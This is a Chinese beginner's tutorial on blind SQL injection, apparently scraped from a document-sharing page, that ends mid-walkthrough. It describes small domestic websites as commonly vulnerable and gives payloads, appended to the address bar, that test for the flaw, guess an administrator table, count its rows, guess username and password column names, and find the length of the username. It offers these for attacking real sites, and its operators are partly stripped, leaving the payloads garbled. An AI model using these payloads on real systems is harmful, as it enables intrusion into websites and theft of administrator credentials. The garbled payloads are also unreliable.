还剩1页未读,继续阅读
文本内容:
菜鸟学习SQL注射电脑资料一般国内的小一点的站点程序都有request这种漏洞,下面我讲解攻击方法在地址栏and1=1查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表在地址栏and0select count*from admin返回页正常,假设成立了,下面来猜猜看一下员表里面有几个管理员IDand1select count*from admin页面什么都没有管理员的数量等于或者小于1个and1=select count*from admin输入=1没显示错误,说明此站点只有一个管理员下面就是要继续猜测admin里面关于管理员用户名和密码的字段名称and1=select count*from adminwhere lenusername0猜解错误!不存在username这个字段只要一直改变括号里面的username这个字段,下面给大家几个常用的user,users,member,members,userlist,memberlist,userinfo,admi n,manager,用户,yonghu用户名称字段猜解完成之后继续猜解密码字段and1=select count*from adminwhere lenpassword0password字段存在!因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧我们已经知道了管理员表里面有3个字段id,user,password id编号user用户名password密码下面继续的就是管理员用户名和密码的猜解了,先猜出长度!and1=select count*from adminwhere lenuser10user字段长度小于10and1=select count*from adminwhere lenuser5user字段长度不小于5慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确and1=select count*from adminwhere lenuser=6下面猜密码...。